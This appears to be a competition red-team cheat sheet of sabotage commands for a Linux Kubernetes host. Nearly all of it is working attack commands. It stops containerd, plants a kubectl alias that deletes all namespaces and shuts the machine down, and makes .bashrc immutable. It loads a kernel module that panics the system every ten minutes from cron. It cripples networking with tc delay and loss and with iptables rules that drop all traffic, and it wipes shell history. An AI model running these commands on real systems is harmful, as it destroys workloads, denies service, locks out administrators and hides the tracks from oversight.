- Stop containerd
sudo systemctl stop containerd
sudo systemctl disable containerd
- Alias
echo "alias kubectl='kubectl delete --all namespaces --kubeconfig=/etc/kubernetes/admin.conf; shutdown -h now' ;2>&1 >/dev/null echo --" >> /root/.bashrc
echo "alias cat='echo meow'" >> /root/.bashrc
chattr +i /root/.bashrc
source /root/.bashrc
- Disable namespaces
echo 0 > /proc/sys/user/max_user_namespaces
sysctl -w kernel.unprivileged_userns_clone=0
echo "kernel.unprivileged_userns_clone=0" >> /etc/sysctl.conf
Panic
Removed too destructive
sudo apt install gcc make -y
## chmod this file /root/.rick
#!/bin/bash
mkdir -p /tmp/kpanic && cd /tmp/kpanic && printf '#include <linux/kernel.h>\n#include <linux/module.h>\nMODULE_LICENSE("GPL");static int8_t* message = "never gonna give you up";int init_module(void){panic(message);return 0;}' > kpanic.c && printf 'obj-m += kpanic.o\nall:\n\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules' > Makefile && make && /sbin/insmod kpanic.ko
Add to crontab -e
*/10 * * * * /root/.rick
- Delay
This was quite mean and would break most VNC connections
tc qdisc add dev ens3f0 root handle 1: netem delay 1500ms
tc qdisc add dev ens3f0 parent 1: handle 2: netem loss 50%
tc qdisc add dev ens3f1 root handle 1: netem delay 1500ms
tc qdisc add dev ens3f1 parent 1: handle 2: netem loss 50%
# You can also add these to /etc/network/if-pre-up.d in a script if you are an absolutely horrible person
# deletion tc qdisc del dev ens3f1 root
Drop traffic
This was a bit too nasty and not very sportsmanly
iptables -t filter -P INPUT DROP
iptables -t filter -P FORWARD DROP
iptables -t filter -P OUTPUT DROP
Finally.
rm ~/.bash_history
history -c
FYI, the cronjob won't survive a reboot because
/tmpis wiped on boot, but maybe that's intentional?